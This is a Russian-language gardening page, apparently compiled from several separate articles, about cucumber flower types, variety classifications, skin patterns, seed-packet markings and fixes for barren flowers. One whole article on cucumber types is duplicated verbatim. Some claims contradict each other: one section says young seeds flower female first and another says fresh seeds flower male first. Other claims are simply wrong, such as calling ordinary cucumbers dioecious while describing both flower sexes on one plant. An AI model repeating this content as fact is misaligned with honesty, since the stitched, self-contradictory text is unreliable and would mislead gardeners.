65 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание цветения огурцов женского и мужского типа

Описание цветения огурцов женского и мужского типа

Цветение огурцов происходит несколькими способами: женским, мужским и гермафродитным. От цветения зависит урожайность, поэтому нужно различать типы цветения.

Описание цветения огурцов женского и мужского типа

Женский тип цветения

Обратите внимание на то, что цветки огурца женского типа характеризуются завязью, точнее небольшим огурцом. Этим они отличаются от мужского типа еще до наступления периода цветения. Партенокарпические формируют завязь зеленца, без признаков опыления. Можно с уверенностью сказать, что такой тип цветения не нуждается в помощи пчел или других опыляемых насекомых.

Для того чтобы пчелоопыляемые огурцы формировали завязи и образовывали плод, должно выполняться опыление пыльцой мужицкого типа. Существуют следующие моменты формирования цветков:

  • длинноплодные гибриды характеризуются тем, что в 1 их узле может формироваться не более 2 цветков женского типа;
  • пучковые огурцы могут формировать в 1 узле около 10 дамских цветочков.

Причины нарушения развития

Довольно часто можно наблюдать ситуацию, когда дамские цветочки развиваются дольше мужских. Это объясняется несколькими причинами.

  1. Это особенности сорта. Большая часть сортов огурцов изначально формирует мужской цветочек, находящийся на главном стебле и только потом на боковых побегах женский вид. Это грозит тем, что оплодотворение задержится на неопределенный срок и урожай собирать придется намного позже.
  2. Причина кроется в семенном качестве. Молодые семена всегда формируют сначала девичий тип и только потом мужской. Если же семена характеризуются возрастом около 2 лет, то формирование цветения обоих полов происходит одновременно. Это позволяет ускорить процесс формирования плода.

Мужской тип цветения

Тычиночный тип цветения характеризуется тем, что не содержит в себе завязей. Описание их внешнего вида указывает на то, что цветки характеризуются желтым цветом и находятся на цветоножке большой длины. Если рассматривать мужские цветочки с точки зрения биологической составляющей, то их главное предназначение – это опыление цветков женского типа, после чего наступает формирование плода. Опыление необходимо для того, чтобы могли формироваться плоды. Это значит, что урожай созреет в короткие сроки.

Партенокарпический огурец растет без осуществления опыления. Но, в этом случае, в них полностью отсутствуют семена. Для того, чтобы была возможность сбора семян, партенокарпические соцветия должны постоянно опыляться пыльцой мужского типа.

Описание указывает на то, что мужские соцветия, чаще всего, начинают формироваться на главном стебле или боковых побегах. Считается, что большая часть такого формирования происходит пучками. Пыльца мужского соцветия довольно тяжелая. Несмотря на это, она не выпадает из основного цветочка, ведь характеристика липкости очень сильно держит ее на своем месте. По этой причине ветер не может разносить пыльцу, а опыление возможно только с помощью пчел или других насекомых.

Гермафродитный тип цветения

Цветок огурца может совмещать в себе мужской и женский пол

Гермафродитный вид – это мужские и женские цветки огурца в одном соцветии. Ему характерны завязи небольшой длины. Из такой завязи, чаще всего, появляются огурцы, представленные в шарообразной форме. Описание указывает на тот факт, что гермафродит содержит в себе, как пестики, так и тычинки. Такие соцветия могут быть, как самоопыляемыми, так и опыляться с помощью насекомых. Однополые цветочки могут быть и мной характеристики.

  1. Андромоноцийный тип. Он включает в себя обоеполые особенности, где преобладает мужской тип.
  2. Гиномоноцийный тип. Характеризуется тем, что содержит гермафродитные наклонности, в большей части женского строения.

Главная особенность этого типа заключается в том, что его цветки двуполые. Некоторые специалисты с уверенностью убеждают фермеров в том, что первые разновидности огурцов были гермафродитами. Именно от них начало происходить разделение на дамские и мужские типы цветения. Большая часть людей старается не использовать растения этого типа для выращивания на продажу. Большую популярность такие растения получили только у селекционеров, которые пытаются создавать новые сорта огурцов.

Как выглядят цветки

Мужское соцветиеимеет чашки, тычинки и венчик. Если вы задаетесь вопросом, сколько тычинок содержит этот вид, то их всего 5. На каждой из них расположен пыльник, в котором и хранится пыльца.

Женские соцветия имеют пестик. Тычинками они не обладают. Пестик состоит из нескольких основных частей: завязи, столба и рыльца. Нижняя часть, как правило, имеет 3 гнезда.

Типы огурцов – какой подходит именно вам

Добавление статьи в новую подборку

Такое простое и всем известное растение, как огурец, оказывается, имеет несколько разновидностей. Знание видов огурцов поможет вам лучше планировать посадки и собирать богатый урожай.

В описаниях семян огурцов часто можно найти такие слова, как «партенокарпический» (gynoecious), «Бейт Альфа», ОБРАБОТ и т.д. При выборе подходящего сорта важно знать и понимать обозначения, которые присутствуют на этикетке, поскольку от этого будет зависеть урожайность и успешное выращивание того или иного сорта огурцов.

Не всегда удается получить хороший урожай в первый же год выращивания новых сортов. Иногда требуется несколько лет, чтобы понять, какие типы оптимально подходят для вашего участка и климата.

Какие бывают основные типы огурцов

Типы огурцов разграничиваются по одному основному критерию – способны они плодоносить с опылением или без него. Сорта, не требующие опыления, называются партенокарпическими. Они подходят для выращивания в теплице или в районах, где мало пчел и других насекомых-опылителей. Иногда на упаковке с такими сортами есть значок теплицы.

Принято считать, что партенокарпические огурцы не такие вкусные, как пчелоопыляемые. Это неверно

Плоды у партенокарпических огурцов не имеют семян.

Разновидностью партенокарпических сортов являются виды gynoecious. На них образуются только женские цветки (из которых потом и получаются плоды). Обычные огурцы относятся к двудомным растениям и имеют мужские и женские цветки. Соотношение обычно такое – 10-20 мужских цветков на 1 женский. Поэтому иногда говорят, что огурцы цветут пустоцветом – при подавляющем количестве мужских цветков не происходит рост и опыление женских и, как следствие, урожай получается мизерным.

Следует различать партенокарпические и самоопыляемые сорта огурцов. В одном цветке у самоопыляемых сортов есть и пестик, и тычинка, поэтому они опыляют сами себя. Плоды таких сортов, в отличие от партенокарпических, всегда имеют хорошо развитые семена.

Кусты пчелоопыляемых сортов огурцов компактные, поэтому их высаживают гуще, чем остальные

Довольно распространенным вариантом являются пчелоопыляемые сорта огурцов. Это классический вид, который подразумевает, что опыление производится только пчелами или шмелями. Без них не появятся завязи и, как следствие, плоды. Пчелоопыляемыми могут быть как гибриды, так и обычные сорта огурцов.

Кстати, о гибридах. Так называют растения, полученные в результате скрещивания двух сортов, обладающих определенным набором полезных характеристик. При покупке гибридные семена огурцов легко отличить по нанесенной на пакетик маркировке F1. Полученные из них растения отличаются повышенной живучестью, устойчивостью к болезням и вредителям, высокой урожайностью.

Типы огурцов в зависимости от предназначения

Другие типы огурцов также достаточно распространены и служат для конкретных целей. связанных, например, с заготовками или иной обработкой.

  • Засолочные огурцы идеально подходят для маринования, консервирования или засолки. Их размеры, как правило, не превышают 10-15 см. Для употребления в свежем виде они тоже годятся, так как имеют тонкую кожуру и сочную мякоть.

Для засолки подбирайте огурцы примерно одного размера

  • Корнишоны. Небольшие огурчики размером 5-8 см, имеющие приятный вкус и хрустящую структуру. Благодаря размерам и тонкой кожуре они заслужили прозвище «огурцы для закуски». Корнишоны обычно имеют вытянутую цилиндрическую форму, их нередко выращивают в теплице.

За открытие секрета консервирования корнишонов французский повар получил 12 000 франков от правительства

  • Салатные огурцы. Огурцы этого типа не спутать ни с какими другими. Они вытянутые и длинные, с плотной гладкой кожурой. Салатные огурцы употребляют в свежем виде или добавляют в салаты. А вот для консервирования или засолки они не годятся – плотная кожица плохо впитывает рассол. Именно эти огурцы чаще остальных продают на рынке, поскольку хранятся они дольше своих «собратьев».

В кожуре огурцов содержится большое количество клетчатки, но она также активно впитывает и вредные вещества

Огурцы могут различаться и по цвету шипов:

  • белошипные – подходят только для салатов;
  • черношипные – употребляют в свежем виде, используют для засолки и маринования.

Типы огурцов в зависимости от региона

Поскольку огурец – одно из самых распространенных в мире растений, то и типов его существует великое множество. Часто их называют по тому региону, в котором они были выращены.

  • Голландские. Узкие и вытянутые огурцы длиной почти 30 см, обычно выращивают в теплице. Плоды с тонкой кожурой получают максимум питательных веществ, но быстро теряют влагу. Поэтому для длительного хранения их упаковывают во влагонепроницаемые целлофановые пакеты.
  • Бейт-Альфа. Этот вид был выведен специально для жаркого климата и высоких температур. По размеру они меньше чем голландские, достигают в длину 10-15 см. А вкус и хрустящая структура этих огурцов никого не оставят равнодушным. Им требуется усиленная защита от обезвоживания и вредителей.
  • Азиатские огурцы. Самый экзотический из рассмотренных нами типов огурцов. Обычно плоды этого вида тонкие и колючие со специфическим вкусом.

Азиатские огурцы отличает необычный внешний вид

В какой рубашке «родился» ваш огурец?

Огурцы различаются между собой не только предназначением, типом опыления и иными параметрами, но и «рисунком» кожуры.

Речь идет о количестве и размерах бугорков и шипов, которые позволяют отнести огурец к тому или иному типу. Известно несколько основных «рубашек» или рисунков.

  • Немецкая рубашка. Огурцы этого типа имеют мелкие бугорки, которые расположены вплотную друг к другу. Шипики усеивают не только бугорки, но и пространство между ними, поэтому зеленцы кажутся пушистыми и даже «колючими». Плоды длиной не более 12 см, имеют короткие продольные полоски. Этот тип считается идеальным для маринования – через микроотверстия рассол проникает внутрь плода быстро и равномерно.

Огурцы в «немецкой рубашке» лучше всего подходят для маринования

Самые популярные сорта огурцов в «немецкой» рубашке: Луховицкий F1, Гармонист F1, Герасим F1, Малютка Анютка F1, Дядя Федор F1, Мадемуазель F1, Изюминка F1, Либелла F1.

  • Голландская рубашка. Плоды, «родившиеся в голландской рубашке», цилиндрической формы и крупнее «немецких». Бугорки на них округлые и их немного меньше, чем у предыдущего вида. Шипики расположены только на бугорках. Также «голландцы» отличаются букетным плодоношением (в пазухе листа образуется до 10 завязей и более). Такие огурцы отлично подходят для маринования, особенно если собраны маленькими, длиной 5-7 см.

С одного куста голландцев собирают много плодов

Самые популярные сорта огурцов в «голландской» рубашке: Лилипут F1, Щедрик F1, Барабулька F1, Бобрик F1.

  • Русская (славянская, восточная) рубашка. Зеленцы небольшие, с крупными и редкими бугорками, плотной мякотью и небольшими черными или бурыми шипами, расположенными только на бугорках. Их длина – 9-13 см. Славянские огурчики идеально подходят для соления, консервирования, маринования, а также для салатов. Рассол медленно проникает внутрь плода, поэтому огурчики получаются хрустящими и вкусными.

Огурцы в «русской рубашке» обычно растут в парниках и теплицах

Самые популярные сорта огурцов в «русской» рубашке: Мурашка F1, Посошок F1, Хуторок F1, Погребок F1, Изящный F1, Конкурент F1, Алёнушка F1, Княжна F1, Джин F1, Полина F1.

  • Азиатская рубашка. Гладкие, вытянутые огурцы, на которых отсутствуют бугорки и шипы. Цвет плодов – темно-зеленый, длина 11-15 см. Огурцы этого типа употребляют в свежем виде и добавляют в салаты. Они очень нежные на вкус, но иногда могут горчить.

Азиатская рубашка – очень популярная в Европе разновидность огурцов

Популярные сорта: Блик F1, Фруктовый F1.

  • Иногда выделяют огурцы в «корейско-японской» рубашке. Плоды бледно-зеленого цвета с редкими бугорками. Длина их не превышает 20 см. Зеленцы хрустящие и сочные, годятся для употребления в свежем виде и приготовления салатов. Также они устойчивы к грибковым и бактериальным заболеваниям.

Плоды корейско-японских огурцов крепкие и здоровые

Примеры сортов: Невеста F1 и Блондин F1

Обозначения на пакетиках с семенами – признак нового сорта?

Часто на пакетиках указывают дополнительную информацию о том, что семена подверглись тому или иному виду обработки. Это не означает, что в результате «модификации» получился новый сорт. Просто такие семена производители подвергли специальной обработке, благодаря которой существенно повысилась их всхожесть. Обычно встречаются такие надписи:

  • ОБРАБОТ. Семена огурцов могут иметь нехарактерный для них цвет: синий, зеленый и т.д. Это признак того, что они обработаны протравителем. Под сокращением от «обработано» должно быть указано наименование вещества, которое применялось.

Протравленные семена нельзя замачивать перед посевом.

  • ПРОГРЕВ. Термообработка, или воздействие на семена высокой температуры, нужна для того, чтобы уничтожить инфекцию, которая часто остается на их оболочке. «Прогретые» семена не нуждаются в обеззараживании, но в отношении них можно выполнять любую предпосевную обработку: замачивание, стратификацию и т.д.

Какие типы огурцов подходят для открытого и закрытого грунта?

Прежде чем приступить к посеву, внимательно изучите представленные ниже таблицы. В них указано, какие типы огурцов можно выращивать в теплице, какие подходят для открытого грунта, а какие – для временных укрытий.

Типы огурцов – какой подходит именно вам

Добавление статьи в новую подборку

Такое простое и всем известное растение, как огурец, оказывается, имеет несколько разновидностей. Знание видов огурцов поможет вам лучше планировать посадки и собирать богатый урожай.

В описаниях семян огурцов часто можно найти такие слова, как «партенокарпический» (gynoecious), «Бейт Альфа», ОБРАБОТ и т.д. При выборе подходящего сорта важно знать и понимать обозначения, которые присутствуют на этикетке, поскольку от этого будет зависеть урожайность и успешное выращивание того или иного сорта огурцов.

Не всегда удается получить хороший урожай в первый же год выращивания новых сортов. Иногда требуется несколько лет, чтобы понять, какие типы оптимально подходят для вашего участка и климата.

Какие бывают основные типы огурцов

Типы огурцов разграничиваются по одному основному критерию – способны они плодоносить с опылением или без него. Сорта, не требующие опыления, называются партенокарпическими. Они подходят для выращивания в теплице или в районах, где мало пчел и других насекомых-опылителей. Иногда на упаковке с такими сортами есть значок теплицы.

Принято считать, что партенокарпические огурцы не такие вкусные, как пчелоопыляемые. Это неверно

Плоды у партенокарпических огурцов не имеют семян.

Разновидностью партенокарпических сортов являются виды gynoecious. На них образуются только женские цветки (из которых потом и получаются плоды). Обычные огурцы относятся к двудомным растениям и имеют мужские и женские цветки. Соотношение обычно такое – 10-20 мужских цветков на 1 женский. Поэтому иногда говорят, что огурцы цветут пустоцветом – при подавляющем количестве мужских цветков не происходит рост и опыление женских и, как следствие, урожай получается мизерным.

Следует различать партенокарпические и самоопыляемые сорта огурцов. В одном цветке у самоопыляемых сортов есть и пестик, и тычинка, поэтому они опыляют сами себя. Плоды таких сортов, в отличие от партенокарпических, всегда имеют хорошо развитые семена.

Кусты пчелоопыляемых сортов огурцов компактные, поэтому их высаживают гуще, чем остальные

Довольно распространенным вариантом являются пчелоопыляемые сорта огурцов. Это классический вид, который подразумевает, что опыление производится только пчелами или шмелями. Без них не появятся завязи и, как следствие, плоды. Пчелоопыляемыми могут быть как гибриды, так и обычные сорта огурцов.

Кстати, о гибридах. Так называют растения, полученные в результате скрещивания двух сортов, обладающих определенным набором полезных характеристик. При покупке гибридные семена огурцов легко отличить по нанесенной на пакетик маркировке F1. Полученные из них растения отличаются повышенной живучестью, устойчивостью к болезням и вредителям, высокой урожайностью.

Типы огурцов в зависимости от предназначения

Другие типы огурцов также достаточно распространены и служат для конкретных целей. связанных, например, с заготовками или иной обработкой.

  • Засолочные огурцы идеально подходят для маринования, консервирования или засолки. Их размеры, как правило, не превышают 10-15 см. Для употребления в свежем виде они тоже годятся, так как имеют тонкую кожуру и сочную мякоть.

Для засолки подбирайте огурцы примерно одного размера

  • Корнишоны. Небольшие огурчики размером 5-8 см, имеющие приятный вкус и хрустящую структуру. Благодаря размерам и тонкой кожуре они заслужили прозвище «огурцы для закуски». Корнишоны обычно имеют вытянутую цилиндрическую форму, их нередко выращивают в теплице.

За открытие секрета консервирования корнишонов французский повар получил 12 000 франков от правительства

  • Салатные огурцы. Огурцы этого типа не спутать ни с какими другими. Они вытянутые и длинные, с плотной гладкой кожурой. Салатные огурцы употребляют в свежем виде или добавляют в салаты. А вот для консервирования или засолки они не годятся – плотная кожица плохо впитывает рассол. Именно эти огурцы чаще остальных продают на рынке, поскольку хранятся они дольше своих «собратьев».

В кожуре огурцов содержится большое количество клетчатки, но она также активно впитывает и вредные вещества

Огурцы могут различаться и по цвету шипов:

  • белошипные – подходят только для салатов;
  • черношипные – употребляют в свежем виде, используют для засолки и маринования.

Типы огурцов в зависимости от региона

Поскольку огурец – одно из самых распространенных в мире растений, то и типов его существует великое множество. Часто их называют по тому региону, в котором они были выращены.

  • Голландские. Узкие и вытянутые огурцы длиной почти 30 см, обычно выращивают в теплице. Плоды с тонкой кожурой получают максимум питательных веществ, но быстро теряют влагу. Поэтому для длительного хранения их упаковывают во влагонепроницаемые целлофановые пакеты.
  • Бейт-Альфа. Этот вид был выведен специально для жаркого климата и высоких температур. По размеру они меньше чем голландские, достигают в длину 10-15 см. А вкус и хрустящая структура этих огурцов никого не оставят равнодушным. Им требуется усиленная защита от обезвоживания и вредителей.
  • Азиатские огурцы. Самый экзотический из рассмотренных нами типов огурцов. Обычно плоды этого вида тонкие и колючие со специфическим вкусом.

Азиатские огурцы отличает необычный внешний вид

В какой рубашке «родился» ваш огурец?

Огурцы различаются между собой не только предназначением, типом опыления и иными параметрами, но и «рисунком» кожуры.

Речь идет о количестве и размерах бугорков и шипов, которые позволяют отнести огурец к тому или иному типу. Известно несколько основных «рубашек» или рисунков.

  • Немецкая рубашка. Огурцы этого типа имеют мелкие бугорки, которые расположены вплотную друг к другу. Шипики усеивают не только бугорки, но и пространство между ними, поэтому зеленцы кажутся пушистыми и даже «колючими». Плоды длиной не более 12 см, имеют короткие продольные полоски. Этот тип считается идеальным для маринования – через микроотверстия рассол проникает внутрь плода быстро и равномерно.

Огурцы в «немецкой рубашке» лучше всего подходят для маринования

Самые популярные сорта огурцов в «немецкой» рубашке: Луховицкий F1, Гармонист F1, Герасим F1, Малютка Анютка F1, Дядя Федор F1, Мадемуазель F1, Изюминка F1, Либелла F1.

  • Голландская рубашка. Плоды, «родившиеся в голландской рубашке», цилиндрической формы и крупнее «немецких». Бугорки на них округлые и их немного меньше, чем у предыдущего вида. Шипики расположены только на бугорках. Также «голландцы» отличаются букетным плодоношением (в пазухе листа образуется до 10 завязей и более). Такие огурцы отлично подходят для маринования, особенно если собраны маленькими, длиной 5-7 см.

С одного куста голландцев собирают много плодов

Самые популярные сорта огурцов в «голландской» рубашке: Лилипут F1, Щедрик F1, Барабулька F1, Бобрик F1.

  • Русская (славянская, восточная) рубашка. Зеленцы небольшие, с крупными и редкими бугорками, плотной мякотью и небольшими черными или бурыми шипами, расположенными только на бугорках. Их длина – 9-13 см. Славянские огурчики идеально подходят для соления, консервирования, маринования, а также для салатов. Рассол медленно проникает внутрь плода, поэтому огурчики получаются хрустящими и вкусными.

Огурцы в «русской рубашке» обычно растут в парниках и теплицах

Самые популярные сорта огурцов в «русской» рубашке: Мурашка F1, Посошок F1, Хуторок F1, Погребок F1, Изящный F1, Конкурент F1, Алёнушка F1, Княжна F1, Джин F1, Полина F1.

  • Азиатская рубашка. Гладкие, вытянутые огурцы, на которых отсутствуют бугорки и шипы. Цвет плодов – темно-зеленый, длина 11-15 см. Огурцы этого типа употребляют в свежем виде и добавляют в салаты. Они очень нежные на вкус, но иногда могут горчить.

Азиатская рубашка – очень популярная в Европе разновидность огурцов

Популярные сорта: Блик F1, Фруктовый F1.

  • Иногда выделяют огурцы в «корейско-японской» рубашке. Плоды бледно-зеленого цвета с редкими бугорками. Длина их не превышает 20 см. Зеленцы хрустящие и сочные, годятся для употребления в свежем виде и приготовления салатов. Также они устойчивы к грибковым и бактериальным заболеваниям.

Плоды корейско-японских огурцов крепкие и здоровые

Примеры сортов: Невеста F1 и Блондин F1

Обозначения на пакетиках с семенами – признак нового сорта?

Часто на пакетиках указывают дополнительную информацию о том, что семена подверглись тому или иному виду обработки. Это не означает, что в результате «модификации» получился новый сорт. Просто такие семена производители подвергли специальной обработке, благодаря которой существенно повысилась их всхожесть. Обычно встречаются такие надписи:

  • ОБРАБОТ. Семена огурцов могут иметь нехарактерный для них цвет: синий, зеленый и т.д. Это признак того, что они обработаны протравителем. Под сокращением от «обработано» должно быть указано наименование вещества, которое применялось.

Протравленные семена нельзя замачивать перед посевом.

  • ПРОГРЕВ. Термообработка, или воздействие на семена высокой температуры, нужна для того, чтобы уничтожить инфекцию, которая часто остается на их оболочке. «Прогретые» семена не нуждаются в обеззараживании, но в отношении них можно выполнять любую предпосевную обработку: замачивание, стратификацию и т.д.

Какие типы огурцов подходят для открытого и закрытого грунта?

Прежде чем приступить к посеву, внимательно изучите представленные ниже таблицы. В них указано, какие типы огурцов можно выращивать в теплице, какие подходят для открытого грунта, а какие – для временных укрытий.

Описание цветения огурцов женского и мужского типа

Почему на огурцах не растут завязи?

Часто садоводы жалуются — огурцов нет, одни пустоцветы. Что делать в таком случае? В чем причина беспрерывного цветения растений одними пустоцветами? Да и нужны ли они вообще, эти пустоцветы?

Прежде всего, значительная задержка появления женских цветков и позднее плодоношение кроется в качестве семян. Если Вы не прислушивались к многочисленным рекомендациям и посеяли свежие семена, то выросшие из них растения образуют сначала мужские цветы — пустоцветы, а потом — женские.

А как быть, если семена у Вас свежие, или Вы не знаете срока давности купленных семян? Сделать это просто — их надо прогреть, и растения из таких семян будут давать женские цветки гораздо раньше обычного.

Другая причина бесплодия огурцов — это нарушение баланса питания, чаще всего обилие в почве азотных удобрений, что вызывает бурный рост плетей, листьев и пустоцветов. В этом случае растениям очень полезна подкормка быстродействующими фосфорными удобрениями, например вытяжкой суперфосфата (2 ст. ложки на 10 л горячей воды) или настоем обычной древесной золы.

Третья причина задержки появления женских цветков — полив растений холодной водой. Температура воды должна быть не ниже 25°С. Нельзя допускать, чтобы вода была холоднее почвы.

Следующая причина «пустоцветного изобилия» — большой избыток влаги в почве. Подсушите почву на огуречной грядке на несколько дней. Как только слегка подвянут листья на растениях, так и сразу же появится изобилие женских цветков. Но при этом — не пересушите почву.

О правильном уходе — в статье Уход за посадками огурца.

Серьезное влияние на «пустоцветное изобилие» также оказывают высокая температура окружающего воздуха, сильная загущенность растений в теплице и т.д.

А если все это не поможет, то сделайте прищипку верхушки главного стебля растений. Она приостановит рост растений в длину, вызовет рост боковых побегов и женских цветков.

А как быть с пустоцветами? Некоторые садоводы удаляют большинство пустоцветов, ошибочно надеясь, что это вызовет рост женских цветков. От их удаления пользы никакой, а ухудшить условия опыления женских цветков можно реально. Пустоцветы на растении сами быстро пожелтеют и отпадут.

Последние годы наибольшей популярностью пользуются пучковые сорта и гибриды огурцов, особенно женского типа цветения, которые отличаются высокой урожайностью и в основном хорошими засолочными качествами.

Это довольно частое явление, особенно в жаркую погоду и в пленочных теплицах. При этом часть завязей не растет и постепенно начинает желтеть, а затем быстро засыхает и отпадает. В чем дело? Причин такого явления несколько:

  • слишком высокая температура воздуха в теплице (свыше 35°С).
  • очень высокая относительная влажность воздуха (свыше 90%).
  • у сортов и гибридов чисто женского типа цветения отсутствие насекомых-опылителей из-за длительной прохладной погоды или отсутствия мужских цветков (пустоцветов). К ним надо обязательно подсевать до 10% огурцов любого сорта-опылителя.
  • очень редкий сбор огурцов. Собирать их надо ежедневно или, в крайнем случае, через день. Переросшие плоды сдерживают налив новых завязей.
  • значительный недостаток питания в почве. Современные гибриды с пучковым плодоношением требуют значительно большего и равномерного содержания питательных веществ в почве. Питания просто не хватает для роста всех завязей в пучке. При этом 1-2 плода растут, а остальные засыхают и отпадают. Поэтому, если на растениях завязей много, их надо каждую неделю подкармливать небольшими дозами настоя коровяка с добавлением в него мочевины.

А чтобы улучшить налив завязей, особенно в прохладную погоду, надо провести некорневую подкормку растений препаратами «Циркон» или «Эпин», которые повышают устойчивость растений к стрессовым ситуациям.

Разные способы ручного опыления

Кисть должна быть с натуральной щетиной и очень мягкой на ощупь. Этой кисточкой нужно аккуратно собрать пыльцу с мужского соцветия и тщательно смазать ею пестики на женских бутонах. Необходимо проследить, чтобы пыльца хорошо осела на кисти, и щетина щедро покрылась жёлтой пылью.

Во втором случае мужские соцветия срываются и прикладываются к женским, как было описано выше. Опылённые бутоны лучше помечать, чтобы не потратить на них случайно время и пыльцу ещё раз. На обработанные цветы надеваются бумажные или тканевые колпачки, а спустя неделю просматриваются. Если завязи увеличенные, то они освобождаются от «плена».

Если огурцы растут у вас на подоконнике зимой над радиатором отопления, то лучше периодически орошать растения, предварительно замульчировав почву, тогда уровень влажности будет оптимальным. Если же вы их выращиваете на балконе летом, то контролировать влажность проще путём проветривания вашей мини-теплицы.

Немаловажное влияние на завязь оказывает и среднесуточная температура, её показатель не должен отклоняться от 20°-26°С. Повышение температуры до 34°С приведёт к стерилизации пыльцы, а понижение до 15°С — к приостановке развития растений, когда завязь не формируется.

Как прищипывать огурцы » Mr.How — мы знаем, как!

Многие предпочитают выращивать овощи сами, это и бюджет экономит, да и душе приятно. Чтобы получить в конце осени хороший урожай, нужно изрядно поработать. Без особого ухода никакой урожай не получится. Вот и огурцы нуждаются в особом внимании, и прищипывать огурцы нужно уметь.

Как прищипывать огурцы

  • Чтобы на стеблях, как можно скорее появились цветки женского пола.
  • Если побеги мужского пола не будут удалены на 80%, то плоды могут быть горькими.

Кроме этого, обратите свое внимание на то, как формируются плети:

  • Если саженцы гибридные, нужно удалить верхушки, образующиеся над шестым листом, оставив только три побега, а от остального избавляемся.
  • Если саженцы обыкновенные, оставляем один стебель и убираем слабые побеги.

Только саженцы женского пола способны формировать цветки у основания первых листиков. Молодое растение еще не способно наполнять плоды питательными веществами. Да и само растение сначала нуждается в хорошей листовой поверхности, и лишь потом появляются плоды.

Нет, не все огурцы одинаково прищипываются. Все зависит от того места, где начнут формироваться женские цветки. Исходя из этого и формируются сорта огурцов.

Это еще один главный вопрос, который интересует молодых садоводов. Как прищипывать огурцы, мы разобрались, а вот, как отличить женский цветок от мужского не знаем.

На самом деле, здесь все просто. Внимательно посмотрите на сам цветок. Мужской цветет на ножке, поэтому его и называют пустоцвет. А у женского цветка сразу видна завязь маленького огурчика. Кроме того, мужские цветки собираются в соцветия по пять – семь штук, тогда, как женские чаще всего расположены одиночно, либо по два – три в пазухах листа.

Теперь вы без труда сможете правильно прищипывать саженцы огурцов. Благодаря чему, соберете хороший урожай. И не будете удивляться, почему у меня были такие хорошие саженцы, с большими зелеными листьями, а огурцов почему-то было очень мало. Научившись правильно прищипывать, вы увеличите свой урожай огурцов.

Классификация сортов огурца и их правильный выбор

Издавна огурец считался обязательной сельскохозяйственной культурой для выращивания у многих народов. Неудивительно, что с развитием производства стали появляться сорта огурцов для закрытого грунта, самоопыляющиеся и даже экзотические, пригодные для культивирования в условиях квартиры, на подоконнике. Современному огороднику для получения высокого урожая важно правильно подобрать сорта, с учетом особенностей климата в конкретном регионе, способа выращивания и свободного времени.

Описание культуры огурец

Огурец — однолетнее растение, относящееся к семейству Тыквенных. Растение отличается корневой системой стержневого типа с многочисленными разветвлениями в верхнем самом плодородном слое. Длина корня достигает 0,8-1,2 метра. Оптимальная температура для растения +20..+22 градуса.

Стебель плетевидной формы, с небольшими желобами. Плеть может достигать 5 метров в длину. По мере роста стебель пускает отростки. Кустовые формы огурцов отличаются небольшим стеблем — до 3 метров, а тепличные формы имеют среднюю длину 5-7 метров.

Плоды в ботанической литературе определяются как тыквина, внутри находятся семенные камеры. Окраска огурцов разная, от светло-салатового до темно-зеленого. При наступлении технической спелости окрас меняется на светло-зеленый или желтоватый. По своей форме бывают разными — от яйцевидных, до цилиндрических и веретенообразных.

Для справки! Средний размер плода огуречной культуры достигает веса в 110-130 грамм. Сроки созревания разные: от суперранних (40 дней) до поздних (более 60 дней).

Классификация сортов огурцов

Сегодня существует несколько типов классификаций культуры:

  • По времени созревания — раннеспелые, самый ранний урожай поспевает за 40 дней, среднеспелые сроком созревания от 45 до 50 дней, позднеспелые свыше 50 дней и поздние созревающие на 60 день после посадки.
  • По селекции — сорта и гибриды. Первые — это огурцы, сохраняющие свои качества на протяжении нескольких поколений. Гибриды (помечаются как F1) — растения, сохраняющие свои качества только в первом поколении.
  • По типу опыления — пчелоопыляемые и партенокарпические, для опыления которых не требуются насекомые.
  • По типу возделывания — для открытого грунта, для закрытого грунта и экзотические, для выращивания на балконе или подоконнике.
  • По типу цветения — с наличием цветков смешанного типа (на одном растении женские и мужские цветы). И исключительно с женскими типами цветков, для которых необходимо дополнительно высевать еще и сорта опылители.
  • По величине плодов классифицируют на корнишоны (длиной плода до 8 см), гибриды салатного типа (длиной до 20-25 см).
  • По характеру поверхности — гладкие, мелкобугорчатые и крупнобугорчатые сорта.

Далее обо всех разновидностях немного более подробно.

Для теплицы

Для выращивания в тепличных условиях используются партенокарпические или самоопыляемые сорта огурцов. Их отличает наличие пестиков и тычинок в одном цветке.

Большинство огурцов, выращиваемых в теплицах, имеют прямую форму, кроме того некоторые гибриды не имеют семян.

В теплицах выращиваются салатные огурцы, сорта для засолки и консервирования, универсальные овощи.

Для справки! Наиболее популярные сорта и гибриды для выращивания в теплице — Маринда F1, Наф-фанто F1, Ира F1, Буратино, Кадриль, Урожайный, Амур, Гинга.

Для открытого грунта

В открытом грунте выращиваются как сортовые огурцы, так и гибриды. В зависимости от климатического района подбирают сорта по срокам созревания, типу опыления и назначения. Чаще всего выбираются ранние и среднеспелые сорта. Предпочтение отдается огурцам, опыляемым пчелами, но неплохие результаты показывают и гибриды женского типа.

В условиях открытого грунта большинство сортов выращивается универсального назначения и для консервирования. Салатные разновидности огородники выбирают реже.

Популярными сортами и гибридами для открытого грунта сегодня являются Кураж, Амур, Сремский F1, Неженский, Бригадный, Тумми, Конни, Миранда, Гектор F1, Кустовой.

Для подоконника

Для выращивания на подоконнике выведен отдельный ряд огурцов, которые имеют специфические свойства.

  • Первое обязательно свойство это устойчивость к небольшому перепаду температур — на подоконнике даже ночью температура опускается не намного, сказывается работающая батарея.
  • Второе условие — произрастание при небольшом количестве света. Ведь даже на окнах с южной стороны дома освещенность намного меньше, чем в теплице.

Среди теневыносливых гибридов, предназначенных для столь экзотических условий выращивания можно назвать: Факел F1, F1 Форвард, F1 Фауст, Оконно-балконный F1, Елизавета F1, F1 Русский стиль.

Самоопыляющиеся

Самоопыляющиеся сорта огурцов используются не только для условий закрытого грунта. Часто такие сорта и гибриды выращивают на открытых грядках.

Использование таких сортов в открытом грунте значительно повышает шанс получить урожай вне зависимости от погодных условий и наличия пчел. Как и сорта для открытого грунта, партенокарпические гибриды применяются и для консервирования и для засолки, обладают характерной горечью и высокими вкусовыми качествами.

Для справки! Среди самоопыляющихся сортов обычно выделяют: АльянсF1, Арфей F1, Задор F1, Герман F1.

Пчелоопыляемые

Урожай пчелоопыляемых сортов огурцов зависит от возможности опыления женских цветков рабочими насекомыми. При отсутствии условий для лета пчел урожай будет под угрозой даже при наличии большого количества цвета.

Еще одной проблемой для пчелопыляемых сортов и гибридов выступает наличие на грядке самоопыляемых сортов — в результате скрещивания получаются огурчики со смешанными качествами, которые не всегда нравятся владельцам грядок. Такие огурцы получаются кривыми, сморщенными, с большой горечью. Поэтому при посадке важно учитывать и этот фактор.

